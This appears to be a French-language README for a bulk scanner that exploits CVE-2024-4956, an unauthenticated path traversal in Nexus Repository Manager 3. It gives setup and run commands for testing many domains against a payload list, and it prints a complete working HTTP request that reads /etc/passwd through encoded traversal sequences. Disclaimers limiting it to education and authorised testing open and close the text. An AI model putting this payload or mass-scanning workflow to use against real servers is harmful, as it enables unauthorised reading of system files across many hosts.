
[CVE-2024-4956] Scanner en masse de traversée de chemin non authentifié pour Nexus Repository Manager 3
Cet outil est destiné uniquement à des fins éducatives et à des tests dans des environnements d'entreprise. https://twitter.com/nav1n0x/ et https://github.com/ifconfig-me déclinent toute responsabilité en cas d'utilisation abusive de ce code. Utilisez-le à vos propres risques. N'attaquez pas une cible que vous n'avez pas la permission de cibler. Cet outil utilise le payload publié publiquement.
Ce scanner aide les passionnés de sécurité à scanner la vulnérabilité de traversée de chemin (Path Traversal) sur les cibles Nexus Repository en masse.
Le scanner affichera le nombre de cibles chargées et l'état du scan en cours. Les URL seront listées avec trois messages d'état : Timeout, Échec ou Succès, selon les résultats. Assurez-vous que targets.txt contient la liste des domaines et lfi-payloads.txt la liste des charges utiles (payloads). Le scanner affichera l'URL en cours de test, se mettant à jour à chaque nouvelle requête, et indiquera respectivement le succès ou l'échec. Le script sauvegarde également une liste des URL réussies dans le répertoire sous le nom successful_urls.txt. Il fournira un résumé du nombre de tentatives réussies à la fin.
Assurez-vous d'avoir Python 3.6+ et pip installés.
Clonez le dépôt :
git clone https://github.com/ifconfig-me/CVE-2024-4956-Bulk-Scanner.gitcd CVE-2024-4956-Bulk-ScannerInstallez les dépendances nécessaires :
pip install -r requirements.txt
Préparez votre fichier targets.txt avec la liste des domaines et lfi-payloads.txt avec la liste des charges utiles (payloads).
Lancez le scanner :
python3 CVE-2024-4956-scanner.py -d targets.txt -p lfi-payloads.txt
GET /%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd HTTP/1.1
Host: target.com:8081
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close


Cet outil est destiné uniquement à des fins éducatives et à des tests dans des environnements d'entreprise. https://twitter.com/nav1n0x/ et https://github.com/ifconfig-me déclinent toute responsabilité concernant le code. Utilisez-le à vos propres risques. N'attaquez pas une cible que vous n'avez pas la permission de cibler.